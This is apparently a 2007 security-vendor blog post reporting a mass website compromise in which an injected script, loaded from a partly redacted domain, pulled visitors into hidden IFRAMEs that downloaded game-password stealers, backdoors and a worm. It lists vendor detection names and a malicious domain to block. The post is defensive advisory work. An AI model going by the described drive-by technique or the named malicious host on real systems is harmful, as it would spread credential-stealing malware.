Subscribe to RSS feeds

Archive for November 8th, 2007
Nov8
by Macky Cruz (Technical Communications)

SANS reports that last November 6, hundreds of Web sites across the Internet were believed to have been compromised by a yet unknown hacker. Details about how and why the attack was perpetrated remain murky. What we know so far is that a certain script which loads http://{BLOCKED}8.net/0.js has been injected into the said sites, the said script leads to a page riddled with invisible IFRAMEs, and these IFRAMEs link to certain pages to automatically download several files.

Some of the files are already proactively detected by generic patterns. The following are specific detections:

  • BKDR_DELF.HBW
  • TROJ_DELF.LGX
  • TROJ_DELF.MUF
  • TROJ_DELF.NHA
  • TROJ_DLOADER.QRE
  • TROJ_DLOADER.RZI
  • TROJ_DLOADER.SRD
  • TROJ_DOWQUE.ID
  • TROJ_DROPPER.CYP
  • TROJ_DROPPER.CZZ
  • TROJ_GENETIK.KK
  • TROJ_RISK.GD
  • TSPY_LEGMIR.CQQ
  • TSPY_ONLINEG.JCG
  • TSPY_ONLINEG.JVR
  • TSPY_ONLINEG.JZH
  • TSPY_ONLINEG.KCU
  • TSPY_ONLINEG.KEQ
  • TSPY_ONLINEG.KER
  • TSPY_ONLINEG.KES
  • TSPY_ONLINEG.KEU
  • TSPY_ONLINEG.KFH
  • TSPY_ONLINEG.KFJ
  • TSPY_ONLINEG.KFX
  • TSPY_ONLINEG.KGA
  • TSPY_ONLINEG.KGB
  • TSPY_ONLINEG.KGE
  • TSPY_ONLINEG.KGT
  • TSPY_ONLINEG.KWB
  • TSPY_ONLINEG.LMB
  • TSPY_ONLINEG.LPE
  • TSPY_QQGAME.HG
  • TSPY_QQGAME.HQ
  • TSPY_QQPASS.DCI
  • TSPY_WOW.AJZ
  • TSPY_WOW.AKA
  • TSPY_WOW.AKO
  • WORM_QQPASS.DCH

A rundown of the forty-plus files give us Trojans, spyware, backdoors, and a worm belonging to families such as, but are not limited to ONLINEG, WOW, QQPASS, and QQGAME, which are known information stealers targeting gamers and QQ users. File sizes ranged from 177KB to 2KB, with the largest being backdoor programs. Backdoors open an infected machine’s ports, allowing remote malicious users control over the system.

Users who visit any of the compromised sites run the risk of getting infected, so gateway admins had better block traffic coming from yl18.net. Trend Micro advises users to deploy technology such as its Total Web Threat Protection in order to remain as secure as possible. Trend Micro Web threat protection technology protects users throughout the network, the gateway and in the Internet cloud.

 
Posted in Malicious Sites, Malware |



 
TrendWatch Hijack This Security Tips for Consumers
Free Online Virus Scan Rootkit Buster Submit Suspicious Files
Global Malware Map RUBotted? Trend Micro
Glossary of Threat Terms

 
© Copyright 2008 Trend Micro IncAll rights reserved. Legal Notice